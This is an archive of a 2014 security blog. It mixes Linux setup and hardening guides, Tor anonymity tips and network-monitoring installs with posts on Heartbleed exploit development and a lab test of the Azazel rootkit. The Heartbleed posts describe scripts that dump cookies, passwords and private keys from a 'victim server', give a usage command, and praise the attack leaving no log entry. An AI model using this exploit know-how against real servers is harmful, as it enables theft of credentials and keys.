Croissants can run on a low-end computer such as Intel ATOM D2550 with 3 network interface cards and 4GB RAM. This configuration is ideal for home network and home office. For business, I recommended to have a more high-end multi-core computer and more than 32GB RAM for Croissants with some tuning on Suricata engine.


Make sure your computer can access to the internet when installing. Meanwhile, the "automatically update" should also be selected when installing Ubuntu Server. Set the Ubuntu Server LTS to UTC time zone at the end of the setup; otherwise, the time stamp of Snorby (event manager web application) will be incorrect. You are required to install OpenSSH only during the installation of Ubuntu Server.

Download the Croissants from here. Extracts it and runs the script namely "nsm_install" with "sudo". After that, re-cabling the computer when necessary and then reboot. That's all! However, the installation may take hours which is depending on the power of your hardware and the internet speed.

You can even reinstall the Snorby database by running "nsm_snorby_db_reinstall" after the trial run.

When you write some local rules, you can update them to the system by running the script "nsm_rules_update". When you want to update the Ubuntu Server, you can run "update_ubuntu". When updating the Croissants, you can run "update_nsm" which will update the system by compiling from source code that download from the internet. Make sure to run those scripts with "sudo".

In addition, Croissants will update the rules file on every 4 hours automatically.

That's all! See you.

Sunday, May 04, 2014

HOWTO : Azazel on Debian Wheezy

I know this rootkit - Azazel for some time; however, I am busy to give it a test. Recently, I am bored and take it a look.

Azazel is a linux userland rookit based on original LD_PRELOAD technique from Jynx (rootkit). Azazel has some features that are very useful for attackers, such as file hidden and anti-debugging.

I set up four virutalbox guests in Debian 7 (Wheezy), Ubuntu 12.04.4 LTS, Ubuntu 14.04 LTS and CentOS 6.5.

The Azazel can be compiled without problem if you installed the required libraries. You need root privilege to install this rootkit. Once installed, you are very hard to remove it unless you re-install your system. However, the developer sugguest to remove one of the files by booting from live cd.

After a very quick test on Azazel under the above mentioned Virtualbox (version 4.3.10 r93012) guests, only Debian can run it flawlessly. Ubuntu cannot be reboot. CentOS cannot be login after the reboot. Azazel cannot be ran properly in Ubuntu and CentOS too. I think no attacker will want to destroy the victim box unless s/he really want to.

After a quick look at the developer's products, I think that the developer is running Debian and his products should be tested on Debian only.

Meanwhile, only backdoor, anti-debugging and file hidden of Azazel on Debian are tested. Plaintext backdoor and Crypthook backdoor cannot be tested successful in my lab. Once the file is hidden, you cannot undo it and it can be access by Azazel only.

If you want to port this rootkit to other Linux distributions, you need to modify the source code. One of the reasons that Linux is harder to be attacked due to too many variants.


To compile Azazel on Debian or Ubuntu, you need to do the following :

apt-get install libpam0g-dev libssl-dev libpcap0.8-dev build-essential git

To compile Azazel on CentOS, you need to do the following :

yum install gcc make pam-devel openssl-devel libpcap-devel

That's all! See you.

Thursday, April 17, 2014

Exploit-Dev : Heartbleed (CVE-2014-0160) Final

Updated the source code on April 20, 2014 to version 0.8.

Since the code that wrote at here is not working for getting the RSA Private key from the Heartbleed vulnerable server, I modified another python script at here. This script is developed by mothran. The script use his version tlslite library to write his code.

I modified his code but I have no time to test the most important feature, capture the RSA Private key. If anyone who have time to test the code that I modified for that purpose, please let me know the result. I can be reached at here.

The limitation of the script is not the power of the attacker's machine but the victim's server. If you use threading feature, the limitation for the threading may be up to 40. Meanwhile, the screen output of the script will be in a mess. However, I set a private key found flag detection in the script.

Be keep in mind that this script may have bug as it is a Proof-of-Concept code. You are reminded that this code may vulnerable to Lucky-Thirteen.

Furthermore, this code may not trigger the IDS/IPS or iptables rules that is target for the first released exploit code. Hereby, I attached the version 0.3 0.4 0.5 0.6 0.7 0.8 here.

If the code is quit unexpectedly for the first try, it is either the victim is not enabled SSL or the victim is not vulnerable. Meanwhile, it is very interesting to know that when the victim server is under the attack, the loading of the server is very low and there is no entry in the access log of the server. Wonderful, right?


May be I am not so lucky to capture the private key from my lab (Apache with OpenSSL). I cannot capture the private key even running the script for days against my lab virtual machine. Does the private key remains in the memory only in some situation? Or, I am not so lucky? Please let me know the reason, thanks.


According to the first winner of Cloudflare Challenge, Fedor Indutny that we need some luck to get the private key even you know how to get it.

To install Node.js, please follow this link.


I even cannot get the private key from Nginx with OpenSSL by Fedor Indutny's code. I wonder if it is because of the Nginx and OpenSSL setting or not. I following this link to set up the Nginx Server.

Recently find the Cloudflare SSL setting on Nginx server at here. I think it is the matter. Meanwhile, according to this article, Ubuntu 13.10 was used in Cloudflare Challenge.

Found a needle in the haystack!

Version : 0.8


How I obtained the private key for - Python
Extracting server private key using Heartbleed OpenSSL vulnerability - Node.js
OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools - Python3

That's all! See you.

Friday, April 11, 2014

Exploit-Dev : Heartbleed (CVE-2014-0160) Reload

Please note that this method may not retrieve the RSA Private key properly but it can retrieve other information from the memory, e.g. session id, cookie, username, password and etc. A working version of the RSA Private key dump will be posted later when it is done.

I modified the Proof-of-Concept by Jared Stafford and Michael Davis at here yesterday. The code is to dump the cookie, session as well as username and password from the memory of the victim server.

If you want to dump the data other than the above mentioned, for example, private key, you need the another method. I modified the source code of Derek Callaway and then monitor the dump by using ngrep. : : :

For the usage, please read the bash script files for details.

See Also :
Exploit-Dev : Heartbleed (CVE-2014-0160) Final
Modified version by Mike Baker for scanning .onion addresses

That's all! See you.

Thursday, April 10, 2014

Exploit-Dev : Heartbleed (CVE-2014-0160)

Jared Stafford developed a Proof-of-Concept code at here for the bug in OpenSSL namely Heartbleed, CVE-2014-0160. You can test the site in question at Heartbleed test.

To test for the client, you need this site

Michael Davis modified the code of Jared Stafford at here to dump the cookie from the memory of the victim server.

Since some parameters in the source code of Michael Davis are hard coded, I modified his work and make the parameters more feasible. Hereby, I am going to explain how to use this piece of code.

For the default value of port (443), cookie id (session) and length of the cookie (1024) :

python victim_server

For customized value of port, cookie id and length of the cookie :

python victim_server -p 8080 -c sessionid -l 4096

The result will be printed out on the screen.

Please note that the format of the victim_server should be "".


Update for Version 2 (dated April 11, 2014)

This version is updated for handling different version of SSL/TLS.

Related : Exploit-Dev : Heartbleed (CVE-2014-0160) Reload
See Also : Exploit-Dev : Heartbleed (CVE-2014-0160) Final

That's all! See you.

Tuesday, March 11, 2014

Ebury SSH Rookit/Backdoor Trojan

About 3 days ago, an Ubuntu user (aka Empire-Phoenix) shouted for help at Ubuntu Forums - Security Discussions that his server has been infected by Ebury SSH Rookit/Backdoor Trojan. In his case, his mail server IP address has been blacklisted due to the infection. His story is here.

CERT Bund has announced the details about this rootkit/backdoor and they also include the Snort rule for the detection. The link is here.

The only solution is to re-install the server(s).

However, the main question is how the intruder(s) compromise our server(s) and install the rootkit? Our server(s) is/are compromised via SSH or other vulnerabilities in the server(s)?

Even if we re-install our server(s) after the infection but leave the unknown factor(s) behind, our server(s) will be infected again. If we installed IDS, we will be notified about the infection but we also need to re-install the server(s) that in question.

I supposed that the server of the captioned Ubuntu user is up-to-date and he had nothing to do with this infection as his server is a production server and he also do not know what is the problem on his server before the infection. The defensive solution is to do penetration test on the server in a regular time and it may prevent this from happening.


More news here.

That's all! See you.

To Be (In)Secure on Kali Linux?

Kali Linux is developed based on Debian 7 (Wheezy). Kali is designed for Penetration Testing and it is running in root privilege. However, almost all the Kali Linux users will also use it as a primary operating system.

When it is using as a Penetration Testing toolkit, the root privilege is in use. When it is using as a primary operating system, the non-root privilege is a good practice. Therefore, a sudoer will be a good choice. However, be keep in mind that sudoer will not guarantee your sudoer account will not be compromised if it equipped with a weak password and easy guess user name.

Penetration Testers or Information Security Researchers will use their browser most of the time as same as other general users. Kali Linux equipped with Iceweasel, which is based on Firefox, and it can use Firefox add-ons. In the BackTrack's old days, we will use "NoScript" Firefox add-on. However, almost all the web sites nowadays are using javascript. It is impossible to disable the javascript or the web broswing experience will be difference. Therefore, "NoScript" is not the solution. However, "NoScript" is blocking XSS attacks by default even the "NoScript" is set to globally allowed.

Kali Linux and tools developers cannot guarantee that their products are free from vulnerabilities. How about if we are being intruded when we are doing pentesting? So embarrassing, right?

If we enable firewall when we are doing pentesting, you will shooting on our toes. If we do not enable the firewall when we are using Kali Linux as primary operating system, we will worrying if anyone can attack our box or not.

Now, we know that what we are facing at the moment. Surfing internet with "NoScript" is not a good solution and we maybe facing vulnerabilites. I think that the best solution for Debian based Linux system is Apparmor.

"AppArmor is an effective and easy-to-use Linux application security system. AppArmor proactively protects the operating system and applications from external or internal threats, even zero-day attacks, by enforcing good behavior and preventing even unknown application flaws from being exploited. AppArmor security policies completely define what system resources individual applications can access, and with what privileges. A number of default policies are included with AppArmor, and using a combination of advanced static analysis and learning-based tools, AppArmor policies for even very complex applications can be deployed successfully in a matter of hours." -- Quoted from Apparmor WiKi.

It is very easy to enable Apparmor on Kali Linux. Just passing some kernel parameters when boot and install related packages.

We can enable (or enforce) all the Apparmor profiles (which includes log systems and some services) as well as we can create our own profiles for Iceweasel and any internet connectivity applications, such as HexChat and VirtualBox. If we have Iceweasel Apparmor profile in action, there is no javascript/java malware can successfully attack the browser. For details, We can refer to the documention of Apparmor at here.

Meanwhile, Kali Linux does not equipped with firewall or firewall is not enabled. There is almost no running service by default setting unless you enable it. Therefore, there is no opening port leaving at the Kali Linux box. In general speaking, firewall is not required in this situation.

In conclusion, if we applying Apparmor to Kali Linux, we will not shooting on our toes when doing pentesting. Meanwhile, Apparmor will also give us some protestion on using Kali Linux as Penetration Testing toolkit and as primary operating system. So, we have the balance.

In case you need to disable Javascript, I would recommend to use Firefox Add-ons - QuickJS. One click to disable and enable Javascript on the toolbar.


HOWTO : Kali Linux 1.0.6 for All Purpose
HOWTO : Perfect Dual Boot Kali Linux 1.0.6 on MacBook Air (Mid 2013) with rEFInd 0.7.7

That's all! See you.

Saturday, March 08, 2014

HOWTO : Perfect Dual Boot Kali Linux 1.0.6 on MacBook Air (Mid 2013) with rEFInd 0.7.7


rEFInd version 0.8.4 is compatible with Mac OSX 10.10.x Yosemite. Existing users please refer to the official site for installation.

UPDATED FOR REFIND 0.8.3 on July 13, 2014

This tutorial is written for MacBook Air (may be other models of Apple computers) and Kali Linux users who want to dual boot Mac OSX and Kali Linux.

Pros :

(1) Use GRUB2 for EFI
(2) Simple and Easy to Use and Install
(3) Mac OSX can be Encrypted but reqires extra work (not in this HOWTO)
(4) Kali Linux can be Encrypted

Cons :

(1) Conexists with Mac OSX
(2) Kali Linux Bootable Live USB cannot be booted with rEFInd (use Option key to boot instead)


Since Kali Linux 1.0.6 is based on Debian 7.0 (Wheezy) which is not EFI enabled by default, the GRUB2 (EFI) will not be installed when installing Kali Linux 1.0.6.

We need to use rEFInd which installed in Mac OSX and post-install the GRUB2 on Kali Linux. Meanwhile, the old GRUB should be removed before hand; otherwise, you will break the system.

Making of Kali Linux Install USB

Please refer to the Kali Linux Documentation of making the install USB at here.

You can also refer to this article for making a persistence USB for the installation if you do not have "Thunderbolt to Ethernet" or "USB 3.0 Gigabit USB LAN Adapter". These two devices can be recognized by Kali Linux out of the box.

Install rEFInd on MacBook Air

Boot up MacBook Air to Mac OSX. Download the rEFInd binary zip file and extract it. Go to "Downloads/refind-bin-0.7.7" "Downloads/refind-bin-0.8.3" and install the rEFInd.

cd Downloads/refind-bin-0.7.7 cd Downloads/refind-bin-0.8.3
sudo ./ --alldrivers

Installation and Partitioning

At the MacBook Air with Mac OSX, execute the "Disk Utility". Create a new partition and making it as two, one is "Macintosh HD" and the new one is "Macintosh HD 2". Applied the change. Then remove the newest created partition (Macintosh HD 2). Do not format it and leave it as is. After that, shut it down.

Insert Kali Linux Live Install USB to the MacBook Air and then power on the MacBook Air with long pressing "Option" key. When the Kali Linux Boot Menu displayed. Select "Live (amd64)" and press "Tab" to append "persistence" at the end of the line. After that, press "Enter". Make sure you are connected to the internet. If not, your install will be failed.

The Kali Linux Live will be launched. Select "Install Kali Linux" from the Menu (Applications -- System Tools). Follow the instructions for the installation. Make sure you have a very strong root password. When you are prompted to do partitioning, you just select "Guided - use the largest continuous free space" for non-encryption installation. Do not select "entire disk" options as it will delete the Mac OSX partitions.

The partitioning for normal install is : /etc/sda1 is EFI, /etc/sda2 is Macintosh HD, /etc/sda3 is Recovery HD, /etc/sda4 is biosgrub (unformatted), /etc/sda5 is / (Kali Linux) and /etc/sda6 is SWAP.

If you want to install whole disk encryption, you need to select "Manual". Do not select "entire disk" options as it will delete the Mac OSX partitions. First of all, create a 400MB to 1024MB EXT2 partition which is mount to "/boot". Then, select "Configure encrypted volumes" and name it as "encrypt_vol" for the remaining available spaces. Choose "/dev/sda free #3" for the encrypt volume. Enter the strong "Encryption passphrase". After that, select "Configure the Logical Volume Manager". Create volume group and name it as "kali". Select "/dev/mapper/sda5_crypt" for the volume group. Select "Create logical volume" and name it as "root" with desired capacity. Re-select "Create logical volume" and name it as "swap" with the remaining spaces. Set mount point "/" as EXT4 for "LVM VG kali, LV root" and "swap" as SWAP for for "LVM VG kali, LV swap".

The encrypted volume should be "sda5_crypt" and it is /dev/sda5 too. We need to get its UUID for the bug fix later. It is because Kali Linux Manual partitioning has a serious bug that not allowing you to boot the box.

The partitioning for encryption install is : /etc/sda1 is EFI, /etc/sda2 is Macintosh HD, /etc/sda3 is Recovery HD, /etc/sda4 is /boot (Kali Linux, EXT2) and /etc/sda5 is Encrypted LVM volume which includes / and SWAP.

When asking for installing the GRUB to MBR, just skip it. We do not need it. If you do so, you will kill the system and you need to reinstall the Mac OSX. After that, wait for the installation to complete.

Install EFI on Kali Linux

When the installation is completed, it will return to the Live Kali Linux. Do not reboot it.

Open a terminal. And complete the following commands :

(A) Normal install without luks encryption

mkdir /mnt/root
mount /dev/sda5 /mnt/root

cd /mnt/root
mount -t proc proc proc/
mount -t sysfs sys sys/
mount -o bind /dev dev/
mkdir boot/efi
mount /dev/sda1 boot/efi

chroot /mnt/root

apt-get --purge remove grub-pc
apt-get --purge autoremove
apt-get install grub-efi-amd64

nano /etc/default/grub

Change from :


Change to :

GRUB_CMDLINE_LINUX_DEFAULT="quiet apparmor=1 security=apparmor pcie_aspm=force radeon.dpm=1 acpi_backlight=vendor libata.force=noncq"



(B) LVM with luks encryption

blkid /dev/sda5

Write down the UUID and the others for further use.

cryptsetup luksOpen /dev/sda5 sda5_crypt
vgchange -ay kali

mkdir /mnt/root
mount /dev/mapper/kali-root /mnt/root

cd /mnt/root
mount -t proc proc proc/
mount -t sysfs sys sys/
mount -o bind /dev dev/
mount /dev/sda4 boot/
mkdir boot/efi
mount /dev/sda1 boot/efi

chroot /mnt/root

apt-get --purge remove grub-pc
apt-get --purge autoremove
apt-get install grub-efi-amd64

nano /etc/default/grub

Change from :


Change to :

GRUB_CMDLINE_LINUX_DEFAULT="quiet apparmor=1 security=apparmor pcie_aspm=force radeon.dpm=1 acpi_backlight=vendor libata.force=noncq"

update-initramfs -u


In case if the Kali Linux cannot be booted and drop you to a initramfs shell. Do not panic. We can fix it.

cryptsetup luksOpen /dev/sda5 sda5_crypt
vgchange -ay

The Kali Linux can be booted up fine. Upon booted up, you need to do the following :

update-initramfs -u


Configuration of rEFInd

Boot to Mac OSX and configure the refind.conf.

sudo nano /EFI/refind/refind.conf

Change from :

scan_all_linux_kernels #scan_all_linux_kernels false

Change to :

#scan_all_linux_kernels scan_all_linux_kernels false

Then, you can boot to Kali Linux without problem.

Tailor-made Kali Linux

Boot to Kali Linux. Then configure it by refering to this guide and this guide.

That's all! See you.

Thursday, March 06, 2014

HOWTO : Dual Boot Kali Linux 1.0.6 on MacBook Air (Mid 2013) with rEFInd 0.7.7

A better method to dual boot Kali Linux on MacBook Air with rEFInd is here.

Pros :

(1) Simple to Use and Install
(2) Straight Forward
(3) Easy to Use and Install

Cons :

(1) No GRUB on Kali Linux
(2) Need to be coexist with Mac OSX
(3) Bootloader is situated in Mac OSX
(4) Need to Edit rEFInd configure file when the Kali Linux Kernel is upgraded
(5) The Mac OSX should not be whole disk encrypted
(6) The Kali Linux cannot be full disk encryption

Step 1 :

First of all, you are required to create a bootable USB pendrive for Kali Linux. Please refer to the Kali Linux Documentation for the procedure at here. I recommend to use 4GB (or larger) USB 2.0 pendrive.

Step 2 :

Boot up Macbook Air and resize the existing partition by adding one more partition with "Disk Utilities". After applied the change, you need to delete the partition that you just created (the partition without Mac OSX). Then leave it unformated.

Step 3 :

Go to rEFInd official site and download the binary zip file. Unzip the downloaded file.

cd Download/refind-bin-0.7.7/
sudo ./ --alldrivers

Step 4 :

Insert the bootable Kali Linux USB pendrive and reboot the Macbook Air with long pressing the "Option" or (alt) key. Upon the boot menu is displayed, select the "Windows" icon to boot the Kali Linux.

Make sure you are connected to the internet by "Thunderbolt to Ethernet" or "PCi USB 3.0 Gagabit LAN Adapter UE-1000T-G3". If you want to connect to internet with wifi, you are required to install the wireless driver by following this guide.

Select "Install" or "Graphical Install". When going to the partition part, select "Install on the available free space". Do not select entire disk; otherwise, you will delete the Mac OSX partitions.

Follow the instruction on screen to install. When you are prompted to select where to install the GRUB, just skip it. GRUB is not required to install.

Then finish the install. Reboot and unplug the USB pendrive.

Step 5 :

Boot to Kali Linux via rEFInd Boot Manager menu. Find out the UUID of EXT4 partition. You can find it at /etc/fstab or "System Monitor". You are also required to write down the file names of /boot. After that, reboot to Mac OSX.

Step 6 :

Boot to Mac OSX via rEFInd Boot Manager menu. Go to the /EFI/refind.

cd /EFI/refind
sudo nano refind.conf

Append the following to the end of the file :

* replace the captioned UUID with your UUID; otherwise, it will not be booted up.

* where 'volume "3:"' is the forth partition that the Kali Linux root is situated.

Step 7 :

Reboot and you will see two Linux icons. The first one is detected automatically which has no optional kernel parameters. Select the second Linux icon which is labelled "Kali Linux". If you can boot to the Kali Linux. The setup is almost completed.

Step 8 :

Reboot to Mac OSX again. Go to the /EFI/refind/refind.conf.

Locate "scan_all_linux_kernels" and comment it out with "#" in the front of the line.

Step 9 :

Reboot to Kali Linux and configure the Kali Linux by following this guide and also this guide. Do not follow the "CUDA" part if you have no nVidia display card.

Step 10 :

After done the Step 9, you can reboot to Kali Linux by selecting the only Linux icon. Now, the setup is completed. Enjoy!

Remarks :

If the Kali Linux kernel is upgraded, you need to change the kernel version at the rEFInd config file.

The full disk encryption for Kali Linux and Mac OSX are not supported.

You may consider to add "noatime, nodiratime, discard" to the /etc/fstab.

That's all! See you.

Saturday, March 01, 2014

HOWTO : Kali Linux 1.0.6 for All Purpose

This article is also suit for Kali Linux 1.0.9a

Kali Linux is designed for penetration testing. I am going to make it for daily use operating system as well as for penetration testing.


Make sure you select full disk encryption when install the Kali Linux on your computer. Your root password should be as strong as possible.

(A) Sudoer

Basic user of Kali Linux is root. For daily usage, a sudoer is much better.

Login as root. Create a new user, e.g. "Samiux" at Applications -- System Tools -- Preferences -- System Settings -- User Accounts. Make sure the new user password is strong enough.

adduser samiux sudo

* where samiux is the new user name.

Then, you need to logout and re-login to make the setting effective. Now, you can use command with "sudo" with your user's password.

(B) Apparmor

It is not effective to use "NoScript" Add-ons on Iceweasel as almost all web pages are using javascript. To protect your browser from being compromised, an alternative way is to implement the Apparmor. Apparmor for Iceweasel can be used in penetration testing and daily use.

sudo apt-get install apparmor apparmor-docs apparmor-notify apparmor-profiles apparmor-utils dh-apparmor python-libapparmor

Edit the /etc/default/grub to make apparmor to active after boot.

sudo nano /etc/default/grub

Locate the following string :


To make it looks like :

GRUB_CMDLINE_LINUX_DEFAULT="quiet apparmor=1 security=apparmor"

Then run the following command :

sudo update-grub

After that, create a file namely usr.lib.iceweasel.iceweasel at /etc/apparmor.d/ :

sudo nano /etc/apparmor.d/usr.lib.iceweasel.iceweasel

Copy the following content to the file and save it.

Then change the mode of iceweasel apparmor to enforce by using the following command :

sudo aa-enforce /etc/apparmor.d/usr.lib.iceweasel.iceweasel

To update the rule of apparmor, just run the following command and ask some questions. Most likely, you just need to answer "Allow".

sudo aa-logprof

(C) Iceweasel Add-ons

You may need to install "FoxyProxy" Add-ons to Iceweasel.

sudo apt-get install xul-ext-foxyproxy-standard

You can install any available Add-ons by searching the database :

sudo apt-cache search xul-ext

(D) Power Saving for Laptop

Applying the following setting, your battery life of your laptop will be extended a bit, for example 2 hours battery life more. I have tested this setting on Lenovo ThinkPad X201s and Apple MacBook Air (Mid 2013) with Live USB as well as a Zotac small PC with nVidia display.

Although the i915 is for Intel display, but it is no harm to add them to your box.

nano /etc/modprobe.d/i915.conf

Append the following :

options i915 i915_enable_rc6=1
options i915 i915_enable_fbc=1
options i915 lvds_downclock=1

update-initramfs -u

This file "99macbookair6" is for USB 3.0 power saving. Download this file, "99macbookair6", make it executable and place it at /etc/pm/power.d/99macbookair6

nano /etc/rc.local

Insert the following before "exit 0".

/etc/pm/power.d/99macbookair6 true

Then install the tlp.

nano /etc/apt/sources.list

Append the following :

deb lucid main

Save and exit. Then run the following :

apt-key adv --keyserver --recv-keys 02D65EFF

apt-get update
apt-get install tlp tlp-rdw

nano /etc/default/tlp

Change the following values.


* Or, leave the /etc/default/tlp settings untouch

To examine the power saving condition, you can install and run "powertop" or/and run "tlp-stat".

sudo apt-get install powertop

sudo nano /etc/default/grub

Locate the following string :

GRUB_CMDLINE_LINUX_DEFAULT="quiet apparmor=1 security=apparmor"

And make it looks like :

GRUB_CMDLINE_LINUX_DEFAULT="quiet pcie_aspm=force apparmor=1 security=apparmor radeon.dpm=1 acpi_backlight=vendor"

Then run the following command :

sudo update-grub

No matter your display card is Intel, nVidia or AMD Radeon, you can apply the captioned setting. Meanwhile, you can alter the settings at the /etc/default/tlp for your display card (any) even the settings labelled as "radeon".

If your laptop is Lenovo ThinkPad, you need to install the following too. After that, restart the tlp or reboot.

sudo apt-get install tp-smapi-dkms acpi-call-tools

(E) Changing Repositories Mirror

If your Kali Linux update/upgrade is slow due to slow mirror, you can hard code the repositories mirror in order to improve the update/upgrade performance.

There is a mirror list of Kali Linux. You can change the mirror at /etc/apt/sources.list by refering to this link.

(F) nVidia CUDA

If you have an nVidia card and wanted to use CUDA to do password cracking, you can refer to this link for the installation.

(G) Some Useful Applications

There are some useful applications that you may want to install to the Kali Linux. You can refer to this link for the installation.

Apparmor for Hexchat (/etc/apparmor.d/usr.bin.hexchat) :

Apparmor for Radiotray (/etc/apparmor.d/usr.bin.radiotray) :

Apparmor for VirtualBox (/etc/apparmor.d/usr.bin.VBox) :

(H) Lenovo ThinkPad TrackPoint

nano /usr/share/X11/xorg.conf.d/20-thinkpad.conf

Copy the following to the 20-thinkpad.conf :

(I) Kali Linux GRUB Background Reborn

After the installation, the GRUB background of the Kali Linux will be blue on black. However, it should be a Kali Linux background. We are going to get it back.

sudo apt-get update
sudo apt-get remove grub-pc
sudo apt-get install grub-pc

After that, you can reboot your computer.

That's all! See you.

Saturday, February 15, 2014

HOWTO : CUDA on Kali Linux 1.0.6

Step 1 :

apt-get install libcudart4 linux-headers-$(uname -r) nvidia-cuda-toolkit

Step 2 :

mkdir /etc/X11/xorg.conf.d

echo -e 'Section "Device"\n\tIdentifier "nVidia GPU"\n\tDriver "nvidia"\n\tOption "NoLogo" "1"\n\tOption "RenderAccel" "1"\n\tOption "TripleBuffr" "true"\n\tOption "MigrationHeuristic" "greedy"\nEndSection' > /etc/X11/xorg.conf.d/20-nvidia.conf


apt-get install nvidia-xconfig

Step 3 :

Update the boot loader to disable the open source nvidia display driver.

sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub

Step 4 (Optional) :

To test the CUDA with multiforcer.

# multiforcer for nvidia (example)
cd /usr/share/multiforcer/
multiforcer -h NTLM -c charsets/charsetall -f test_hashes/Hashes-NTLM-Full.txt --noopencl --nocpu

Step 5 (Optional) :

John the Ripper for CUDA.

# 64-bit
tar -xvzf john-1.7.9-jumbo-7.tar.gz
cd john-1.7.9-jumbo-7/src
make clean linux-x86-64-gpu

cd ../run
./john --help

That's all! See you.

Wednesday, February 12, 2014

HOWTO : Kali Linux 1.0.6 on MacBook Air (Mid 2013) 13 inches

I make a persistence USB pendrive for the Kali Linux 1.0.6 (x86_64). I boot it up and find out that almost everything is working out of the box on my MacBook Air (Mid 2013) 13 inches.

The procedure of making a persistence Kali Linux USB pendrive and how to boot to persistence mode, please refer to the official site of Kali Linux.

One of the out-of-order devices is wireless. The wireless device of my MacBook Air is Broadcom 4360. Since Ubuntu is based on Debian and Kali Linux is based on Debian, I steal the Broadcom STA driver from Ubuntu and apply to Kali Linux.


The Broadcom driver of Ubuntu is situated at here.

Step 1 :

apt-get install dkms linux-headers-$(uname -r)

Step 2 :

Download the latest version of the source file.


dpkg -i bcmwl-kernel-source_6.30.223.141+bdcom-0ubuntu2_amd64.deb

After the installation, the wireless APs will be detected and login.


Step 3 :

The keyboard is not mapping correctly and the following will fix it.

nano /etc/modprobe.d/hid_apple.conf

Append the following :

options hid_apple iso_layout=0
options hid_apple fnmode=1

For reference, please refer to this article.

Power Saving

You can have more than 10 hours battery life if you apply the following.

Step 4 :

nano /etc/modprobe.d/i915.conf

Append the following :

options i915 i915_enable_rc6=1
options i915 i915_enable_fbc=1
options i915 lvds_downclock=1

Step 5 :

Download this file, "99macbookair6", make it executable and place it at /etc/pm/power.d/99macbookair6

nano /etc/rc.local

Insert the following before "exit 0".

/etc/pm/power.d/99macbookair6 true

Step 6 :

nano /etc/apt/sources.list

Append the following :

deb lucid main

Save and exit. Then run the following :

apt-key adv --keyserver --recv-keys 02D65EFF

apt-get update
apt-get install tlp tlp-rdw

nano /etc/default/tlp

Change the following values.


* Or, leave the /etc/default/tlp settings untouch

Step 7 :

Reboot. Upon bootup, press <tab>, and append "persistence" to launch Kali Linux.

Step 8 :

To examine the power saving condition, you can install "powertop" and run "tlp-stat".


You can apply the power saving part to any Linux laptop.

If you want to install Kali Linux on your MacBook Air (Mid 2013), you have to fight to EFI.

By the way, this Kali Linux USB pendrive can boot from any laptop that support x86_64 CPU.

If you are using USB 3.0 pendrive, after the making the live USB or updated the live USB, you need to boot it up once on USB 2.0 computer. Otherwise, the USB 3.0 pendrive cannot be bootup on MacBook Air. It is very interesting.

If Kali Linux is installed on the MacBook Air, you need to do the following :

update-initramfs -u

Meanwhile, if Kali Linux is installed on the MacBook Air, you need to add "noatime, nodiratime" to ext4 at /etc/fstab.

For dual boot Kali Linux on MacBook Air, you can refer to this guide.


(1) Ubuntu Documentation - Apple MacBook Air (Mid 2013)
(2) Debian Documentation - Apple Keyboard
(3) TLP - Linux Advanced Power Management

That's all! See you.

Saturday, February 01, 2014

Interview with a BlackHat

Robert Hansen, who is a holder of CISSP, is the Director of Product Management at WhiteHat Security. He has an interview with a BlackHat who has decided to go legit.

The following are the Blog of Robert Hansen for the interview. Worth to read if you are a law enforcement, whitehat, admin, programmer, users :

Interview with a blackhat - Part 1
Interview with a blackhat - Part 2
Interview with a blackhat - Part 3

That's all! See you.

Wednesday, January 22, 2014

HOWTO : Chatting in Freenode Anonymously with NightHawk

NightHawk is running Tor (The Onion Router) transparently as a middle box. You can chatting in Freenode anonymously with Nighthawk with a little bit change in the configuration.

Start up the NightHawk and running it behind a router. Then configure the IRC Client as the following :

(1) The address of the is replaced by one of the following urls :


The first one is the most used and you may find that you cannot login to the Freenode often especially in the peak hours. You can then select the others.

(2) Disable the Proxy setting.

(3) You can use normal port (e.g. 6667) or SSL port (e.g. 6697).

(4) Make sure you use SASL for the server. Therefore, you need to register your username. For the Freenode configuration, please refer to her official site or user manual.

That's all! See you.

HOWTO : Browsing Anonymously with Google Nexus 5 (Android)

In order to browse internet anonymously with Android, you need to run Tor (The Onion Router) and Firefox with some other related Firefox Add-ons.


Google Nexus 5 (or other Android mobile phone)


(1) Firefox Browser for Android
(2) Orbot
(3) Proxy Mobile (Firefox Add-ons)
(4) Phony (Firefox Add-ons)
(5) Clear Quit (Firefox Add-ons)
(6) Self-Destructing Cookies (Firefox Add-ons)
(7) DuckDuckgo (TOR) (Firefox Add-ons)


You can get the Orbot from Google Play Store. It can install to any Android mobile phone (with or without rooted). It will run the Tor. Once the Tor is running, your browser will not functioning properly. You need to install Proxy Mobile. When the browser is working, your Google search engine will refuse to work. It is because Google Search Engine banned the Tor network. You are required to install DuckDuckgo Search Engine. Make sure Orbot is set to active when boot if you want to browse the internet forever.

Firefox Browser for Android

You can get the Firefox Browser for Android from Google Play Store.

Proxy Mobile

You can get the Proxy Mobile from Google Play Store. After the installation, you need to configure it to make it function with the Firefox.

Use Proxy - Enable
SOCKS Proxy host -
SOCKS Proxy Port - 9050
SOCKS Remote DNS - Enable


You can get the Phony from Google Play Store. You can change the User Agent of the Firefox when you like or leave it untouched as default.

Clear Quit and Self-Destructing Cookies

You can get them from the following link.

Guardian Project

DuckDuckgo (TOR)

You can get the DuckDuckgo (TOR) from Google Play Store. Make sure you set it as default search engine or enable to list all the available engines. When search, you should select DuckDuckgo to carry out the search.

When all the required softwares and add-ons have been installed, you are required to reboot the Google Nexus 5 if it cannot browse the internet properly.

One of the drawback is the speed. The speed of the browsing will be slightly deducted. If your mobile phone plan is a slow one, you will be suffer and it is not recommended to run Tor.

When you are going to browse the internet, start the Firefox with "New Private Tab" after the Orbot is started.

That's all! See you.